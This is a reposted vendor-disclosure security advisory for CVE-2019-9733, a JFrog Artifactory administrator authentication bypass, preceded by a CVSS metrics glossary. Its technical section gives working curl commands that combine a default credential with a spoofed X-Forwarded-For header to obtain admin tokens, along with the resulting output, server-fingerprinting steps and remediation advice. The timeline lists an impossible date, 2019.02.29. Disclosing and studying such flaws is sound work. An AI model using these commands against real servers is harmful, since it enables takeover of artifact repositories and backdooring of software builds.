The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: JFrog Artifactory Administrator Authentication Bypass
CipherTechs Inc - Security Advisory
JFrog Artifactory Administrator Authentication Bypass
Introduction
============
JFrog Artifactory (https://jfrog.com/artifactory/) is a popular universal artifact repository manager commonly used by software developers. CipherTechs' Red Team discovered a high risk vulnerability that allows unauthenticated remote attackers to obtain administrative access to Artifactory servers and assume control of all stored artifacts and builds.
CVE
====
CVE-2019-9733
Affected Platforms and Versions
===============================
Product: JFrog Artifactory
Version: < 6.8.6
Vulnerability Overview
======================
Security risk: Critical
Attack vector: Remote
Vendor Status: Fixed in version 6.8.6 released March 12, 2019
https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
Vulnerability Description
=========================
Artifactory has an account that can be used to reset the admin account password from localhost.
By providing the HTTP header X-Forwarded-For it is possible to bypass Artifactorys whitelist allowed_ips.
Accessing the internal "password reset" admin account exposes the primary admin account's access token allowing an attacker to obtain admin access to the Artifactory server without disrupting other users' access.
This vulnerability is exploitable in most configurations including when an external SSO provider such as Okta or Onelogin is used.
Technical details
=================
Artifactorys documentation [1] states that a default account, access-admin, is present and can be used to reset the admin users password. CipherTechs used curl to see if the access-admin account was present and had the default password of password.
$ curl -ks -u access-admin:password https://artifactory.lan/artifactory/api/access/api/v1/users/ {
"errors" : [ {
"code" : "FORBIDDEN",
"message" : "User 'access-admin' is not allowed to login from remote address: [IP REDACTED]"
} ]
}
The error message shows that the credential access-admin:password is valid, but not allowed to login remotely. CipherTechs bypassed this measure by providing a X-Forwarded-For HTTP header and set it to 127.0.0.1 (localhost).
$ curl -ks -H 'X-Forwarded-For: 127.0.0.1' -u access-admin:password https://artifactory.lan/artifactory/api/access/api/v1/users/ | jq .
{
"users": [
{
"username": "access-admin",
"realm": "internal",
"status": "enabled",
"allowed_ips": [
"127.0.0.1"
],
"created": "2019-01-19T20:00:40.327Z",
"modified": "2019-02-14T15:55:41.052Z",
"last_login_time": "1970-01-01T00:00:00.000Z",
"custom_data": {},
"password_expired": false,
"password_last_modified": 1518623741047,
"groups": []
},
{
"username": "admin",
"realm": "internal",
"status": "enabled",
"allowed_ips": [
"*"
],
"created": "2019-01-19T20:01:09.806Z",
"modified": "2019-02-14T15:38:54.481Z",
"last_login_time": "2019-02-20T11:53:57.973Z",
"last_login_ip": "[REDACTED]",
"custom_data": {
"public_key": "[REDACTED]",
"updatable_profile": "true",
"basictoken_shash": "[REDACTED]",
"private_key": "[REDACTED]",
"artifactory_admin": "true",
"basictoken": "[REDACTED]"
},
"password_expired": false,
"password_last_modified": 1518623741101,
"groups": []
[ CIPHERTECHS: LONG RESPONSE REMOVED FOR BREVITY. All users, keys, and tokens are returned]
Once authenticated as admin, the full rich Artifactory API was available [2] and yielded sensitive details. For example, the following request retrieves all builds.
$ curl -H"Authorization: Bearer $basictoken_value" -ks https://artifactory.lan/artifactory/api/builds/
The admin account has rights to publish artifacts and can overwrite existing files, making it possible for an attacker to backdoor existing artifacts that current and future builds depend on and giving persistent access across all environments and developer workstations.
Artifactory servers can be discovered by requesting the URI /artifactory/webapp/ and looking for the X-Artifactory-Id HTTP response header.
$ curl -I https://artifactory.lan/artifactory/webapp/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-store,max-age=0
Cache-control: no-cache="set-cookie"
Content-Length: 2239
Content-Type: text/html
Date: Mon, 23 Feb 2019 17:24:08 GMT
ETag: W/"2239-1549437200000"
Last-Modified: Wed, 06 Feb 2019 07:13:20 GMT
Server: Artifactory/6.7.3
X-Artifactory-Id: d9b50a320385a5e306762e0c0a88ad4f6fe1527b
X-Artifactory-Node-Id: artifactory-node-1
X-FRAME-OPTIONS: DENY
Connection: keep-alive
Recommendations
===============
Upgrade to JFrog Artifactory 6.8.6 or higher.
Change the default access-admin password.
Block external access to /api.
Review Artifactory logs for previous API use and any signs of access from unauthorized IP addresses.
Revoke basic tokens for all users. The example command below will revoke the basic token for the access-admin account.
curl -H "Content-Type: application/json+merge-patch" -XPATCH -uaccess-admin --data '{"username":"admin","custom_data":{"basictoken_shash":{"value":"REDACTED","sensitive":false},"basictoken":{"value":"","sensitive":true}}}' https://artifactory.lan/artifactory/api/v1/users/admin
Timeline
=========
2019.02.25 - Vulnerability discovered by CipherTechs
2019.02.28 - JFrog notified
2019.02.29 - JFrog provided interim fix for CipherTechs' client and began working on a patch.
2019.03.12 - Fixed version of Artifactory published at https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
2019.03.21 - Public disclosure
Credits
=======
CipherTechs Red Team
CipherTechs would like to thank JFrog for their professional response to this vulnerability disclosure.
References:
[1] https://www.jfrog.com/confluence/display/RTF/Managing+Users
[2] https://www.jfrog.com/confluence/display/RTF/Artifactory+REST+API
The contents of this advisory are Copyright(c) 2019 CipherTechs Inc.
=====================================================================================
About CipherTechs
CipherTechs is a global Cyber Security service provider founded in 2001 that remains privately held with headquarters in New York City. CipherTechs is exclusively focused on cyber security and provide a full service solution portfolio. We service our customers through the following main practice areas: Offensive Security, Defensive Security, MSSP and SOC, Audit and Compliance, Training and Product Procurement.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum